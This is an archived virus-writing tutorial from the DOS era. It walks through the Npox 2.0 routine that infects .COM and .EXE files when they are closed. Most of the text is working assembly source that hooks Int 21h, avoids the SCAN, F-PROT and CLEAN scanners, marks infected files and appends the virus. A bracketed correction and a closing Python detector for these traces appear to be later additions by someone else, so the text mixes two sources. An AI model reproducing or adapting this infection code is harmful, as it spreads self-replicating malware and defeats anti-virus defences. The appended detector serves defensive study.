💾 Archived View for spam.works › mirrors › textfiles › virus › rstut004.txt captured on 2023-11-14 at 12:53:20.


                        ****************************                          
                        **  Infection on Closing  **                          
                        **                        **                          
                        **  By Rock Steady/NuKE   **                          
                        ****************************                          

This routine goes out for a few people that had trouble hacking this
routine themselves... I kinda like it, it's my very OWN, no Dark Avenger
hack, it is VERY straightforward, and kinda simple... I was not going
to put this here, but since I `Promised' people and left them hanging
with `Wait for IJ#5', I guess I owed you it... huh?
                                                                              
Again, this code comes right out of Npox 2.0. It's neat, simple, fast,
cool, and it works; Npox is your example. I heard MANY MANY complaints
about other `Virus writing guides', meaning they explained the code but
sometimes the author himself never checked if the code was good, as he
may have modified it and not tested it... or whatever reason... Anyhow
                                                                              
------------------                                                            
Okay, once you have intercepted the Int 21h close-file function (the
author writes ah=3Dh here; note that ah=3Dh is the DOS open call and
ah=3Eh is close-handle, which is the call that carries the handle in BX
as this code expects) you make it jump here...
                                                                              
closing_file:   cmp     bx,0h                   ;Handle=0?                    
                je      closing_bye             ;if equal leave               
                cmp     bx,4h                   ;Handle > 4                   
                ja      close_cont              ;if YES ,then JUMP!           
closing_bye:    jmp     dword ptr cs:[int21]    ;Leave, no interest to us     
                                                                              
The whole point of the above code is that DOS contains 5 predefined
handles, 0 -> 4. Basically, those handles are the NULL, CON, AUX,
COMx, LPTx handles (the standard devices), so we surely do not need to
continue once we encounter one of those...
                                                                              
close_cont:     push    ax                                                    
                push    bx                                                    
                push    cx                                                    
                push    dx                                                    
                push    di                                                    
                push    ds                                                    
                push    es                                                    
                push    bp                                                    
                                                                              
Our biggest problem is: how do we know if this file is a .COM or .EXE or
simply just another dumb data file? We need this info before we can
try to infect it... We do this by going through DOS's "List of Lists";
this will give us all the INFO needed on the file handle number we have
in BX, and we do that like so...
                                                                              
                push    bx                      ;Save File Handle             
                mov     ax,1220h                ;Get the Job File Table       
                int     2fh                     ;(JFT)                        
                                                                              
This will give us the JFT entry for the CURRENT file handle in BX, which
is returned in ES:DI. Then we use this information to get the address of
the System File Table entry!
                                                                              
                mov     ax,1216h        ;Get System File Table (List)         
                mov     bl,es:[di]      ;system file table entry number       
                int     2fh                                                   
                pop     bx              ;restore the Handle                   
                                                                              
                add     di,0011h                                              
                mov     byte ptr es:[di-0fh],02h                              
                                                                              
                add     di,0017h                ;Jump to the ASCIIZ string    
                cmp     word ptr es:[di],'OC'   ;Is it a .COM file?           
                jne     closing_next_try        ;Next cmp...                  
                cmp     byte ptr es:[di+2h],'M'                               
                jne     pre_exit                ;Nope exit                    
                jmp     closing_cunt3           ;.COM file continue           
                                                                              
closing_next_try:                                                             
                cmp     word ptr es:[di],'XE'   ;Is it a .EXE file?           
                jne     pre_exit                ;No, exit                     
                cmp     byte ptr es:[di+2h],'E'                               
                jne     pre_exit                ;No, exit                     
                                                                              
If it is an .EXE file, check if it is F-PROT or SCAN. See, F-PROT when
started up opens itself, closes itself, etc., so that a dumb
virus will infect it, and then the CRC value changes and F-PROT
screams... haha... Fuck-Prot! is the name...
                                                                              
closing_cunt:   cmp     word ptr es:[di-8],'CS'                               
                jnz     closing_cunt1              ;SCAN                      
                cmp     word ptr es:[di-6],'NA'                               
                jz      pre_exit                                              
                                                                              
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                               
                jnz     closing_cunt2              ;F-PROT                    
                cmp     word ptr es:[di-6],'RP'                               
                jz      pre_exit                                              
                                                                              
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                               
                jnz     closing_cunt3                                         
                cmp     word ptr es:[di-6],'AE'    ;CLEAN                     
                jnz     closing_cunt3                                         
                                                                              
pre_exit:       jmp     closing_nogood                                        
                                                                              
The REST is pretty much the EXACT same as `how' you'd infect a normal
file; I'll leave it for you to go through it... The hardest part is
OVER! The only tricky part is the ending... Remember: either close the
file yourself and then do an IRET (you don't hand control to DOS, as you
only needed to close it, so do it), OR DON'T close it and return to DOS,
as DOS will close it. Just DON'T CLOSE IT TWICE!!!!
                                                                              
closing_cunt3:  mov     ax,5700h                        ;Get file Time        
                call    calldos21                                             
                mov     al,cl                                                 
                or      cl,1fh                                                
                dec     cx                              ;60 Seconds           
                xor     al,cl                                                 
                jz      closing_nogood                  ;Already infected     
                                                                              
                push    cs                                                    
                pop     ds                                                    
                mov     word ptr ds:[old_time],cx       ;Save time            
                mov     word ptr ds:[old_date],dx                             
                                                                              
                mov     ax,4200h                        ;jmp beginning of     
                xor     cx,cx                           ;file...              
                xor     dx,dx                                                 
                call    calldos21                                             
                                                                              
                mov     ah,3fh                          ;Get first 1b byte    
                mov     cx,1Bh                                                
                mov     dx,offset buffer                                      
                call    calldos21                                             
                                                                              
                jc      closing_no_good                 ;error?               
                mov     ax,4202h                        ;Jmp to the EOF       
                xor     cx,cx                                                 
                xor     dx,dx                                                 
                call    calldos21                                             
                                                                              
                jc      closing_no_good                                       
                cmp     word ptr ds:[buffer],5A4Dh      ;.EXE file?           
                je      closing_exe                     ;Yupe then jmp        
                mov     cx,ax                                                 
                sub     cx,3h                                                 
                mov     word ptr ds:[jump_address+1],cx  ;Figure out the      
                call    infect_me                        ;jmp for .com        
                                                                              
                jc      closing_no_good                                       
                mov     ah,40h                          ;Write it to file     
                mov     dx,offset jump_address                                
                mov     cx,3h                                                 
                call    calldos21                                             
closing_no_good:                                                              
                mov     cx,word ptr ds:[old_time]       ;Save file time       
                mov     dx,word ptr ds:[old_date]       ;& date               
                mov     ax,5701h                                              
                call    calldos21                                             
                                                                              
closing_nogood: pop     bp                                                    
                pop     es                                                    
                pop     ds                                                    
                pop     di                                                    
                pop     dx                                                    
                pop     cx                                                    
                pop     bx                                                    
                pop     ax                                                    
                jmp     dword ptr cs:[int21]                                  
                                                                              
As you see above, we DIDN'T close the file, so we leave DOS to do it.
The part below is for infecting .EXEs...
                                                                              
closing_exe:    mov     cx,word ptr cs:[buffer+20]      ;Save the original    
                mov     word ptr cs:[exe_ip],cx         ;CS:IP & SS:SP        
                mov     cx,word ptr cs:[buffer+22]                            
                mov     word ptr cs:[exe_cs],cx                               
                mov     cx,word ptr cs:[buffer+16]                            
                mov     word ptr cs:[exe_sp],cx                               
                mov     cx,word ptr cs:[buffer+14]                            
                mov     word ptr cs:[exe_ss],cx                               
                                                                              
                push    ax                                                    
                push    dx                                                    
                call    multiply                                              
                sub     dx,word ptr cs:[buffer+8]                             
                mov     word ptr cs:[vir_cs],dx                               
                push    ax                                                    
                push    dx                                                    
                call    infect_me                                             
                pop     dx                                                    
                pop     ax                                                    
                mov     word ptr cs:[buffer+22],dx                            
                mov     word ptr cs:[buffer+20],ax                            
                pop     dx                                                    
                pop     ax                                                    
                jc      closing_no_good                                       
                                                                              
                add     ax,virus_size                                         
                adc     dx,0                                                  
                                                                              
                push    ax                                                    
                push    dx                                                    
                call    multiply                                              
                sub     dx,word ptr cs:[buffer+8]                             
                add     ax,40h                                                
                mov     word ptr cs:[buffer+14],dx                            
                mov     word ptr cs:[buffer+16],ax                            
                pop     dx                                                    
                pop     ax                                                    
                                                                              
                push    bx                                                    
                push    cx                                                    
                mov     cl,7                                                  
                shl     dx,cl                                                 
                                                                              
                mov     bx,ax                                                 
                mov     cl,9                                                  
                shr     bx,cl                                                 
                                                                              
                add     dx,bx                                                 
                and     ax,1FFh                                               
                jz      close_split                                           
                inc     dx                                                    
close_split:    pop     cx                                                    
                pop     bx                                                    
                                                                              
                mov     word ptr cs:[buffer+2],ax                             
                mov     word ptr cs:[buffer+4],dx                             
                                                                              
                mov     ah,40h                                                
                mov     dx,offset ds:[buffer]                                 
                mov     cx,20h                                                
                call    calldos21                                             
                                                                              
closing_over:   jmp     closing_no_good                                       
                                                                              
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-    
;                   Infection Routine...                                      
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-    
infect_me       proc                                                          
                mov     ah,40h                                                
                mov     dx,offset init_virus                                  
                mov     cx,virus_size                                         
                call    calldos21                                             
                                                                              
                jc      exit_error                      ;Error Split          
                mov     ax,4200h                                              
                xor     cx,cx                           ;Pointer back to      
                xor     dx,dx                           ;Top of file!         
                call    calldos21                                             
                                                                              
                jc      exit_error                      ;Split Dude...        
                clc                                     ;Clear carry flag     
                ret                                                           
exit_error:                                                                   
                stc                                     ;Set carry flag       
                ret                                                           
infect_me       endp
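As an added, defensive example (not code from this text or from Npox): the two traces the routine above leaves on a file, the "60 seconds" timestamp marker set in closing_cunt3 and an entry point redirected into code appended at the end of the file (the .COM JMP patch and the rewritten CS:IP in the MZ header), are exactly what an integrity checker can look for. The header layout and the sample images it tests are constructed inline; nothing is read from disk.

```python
import struct

# Heuristic checks for the traces left by an infection-on-close routine.
# Sample .COM and .EXE images below are constructed, not real files.

def decode_dos_time(t):
    """Unpack a DOS time word into (hour, minute, second)."""
    return (t >> 11) & 0x1F, (t >> 5) & 0x3F, (t & 0x1F) * 2

def has_invalid_seconds(t):
    """The routine's 'or cl,1fh / dec cx' leaves the 5-bit seconds field
    at 30, i.e. 60 seconds. A real clock never produces that value."""
    return decode_dos_time(t)[2] >= 60

def mz_entry_in_tail(data, tail_bytes):
    """True when an MZ file's CS:IP points into the last tail_bytes of the
    load module, which is where code appended to the end of a file runs.
    Header offsets used: +2 last-page size, +4 page count, +8 header
    paragraphs, +20 IP, +22 CS (the fields the routine rewrites)."""
    if len(data) < 0x20 or data[:2] != b"MZ":
        return False
    last_page, pages, hdr_paras = struct.unpack_from("<HHxxH", data, 2)
    ip, cs = struct.unpack_from("<HH", data, 20)
    image = (pages - 1) * 512 + last_page if last_page else pages * 512
    module = image - hdr_paras * 16          # size of the load module
    if module <= tail_bytes:
        return False                         # too small to judge
    return cs * 16 + ip >= module - tail_bytes

def com_jump_in_tail(data, tail_bytes):
    """True when a .COM file starts with a near JMP (E9 rel16) whose target
    lies in the last tail_bytes of the file, the pattern the routine's
    3-byte 'jump_address' patch produces (target = original file size)."""
    if len(data) < 3 or data[0] != 0xE9:
        return False
    rel = struct.unpack_from("<h", data, 1)[0]
    target = 3 + rel                         # offset from start of image
    return 0 <= target < len(data) and target >= len(data) - tail_bytes

def make_mz(size, cs, ip, hdr_paras=2):
    """Constructed MZ image of `size` bytes with the given entry point."""
    hdr = bytearray(hdr_paras * 16)
    struct.pack_into("<2sHHHH", hdr, 0, b"MZ", size % 512,
                     -(-size // 512), 0, hdr_paras)
    struct.pack_into("<HH", hdr, 20, ip, cs)
    return bytes(hdr) + bytes(size - len(hdr))

def make_com(code_len, appended_len):
    """Constructed .COM image: a JMP over code_len bytes of original code
    to an appended block of appended_len bytes (all zero here)."""
    return (b"\xE9" + struct.pack("<h", code_len - 3)
            + bytes(code_len - 3 + appended_len))

if __name__ == "__main__":
    print("marker 11:59:60 flagged:", has_invalid_seconds(0x5F7E))
    print("EXE entry in tail:", mz_entry_in_tail(make_mz(1024, 58, 14), 100))
    print("COM jump to appended code:", com_jump_in_tail(make_com(500, 200), 300))
```

The seconds check is the cheapest of the three and catches every file this routine has marked, whether or not the infection itself succeeded; the entry-point checks are generic appended-code heuristics and should be combined with stored checksums rather than used alone.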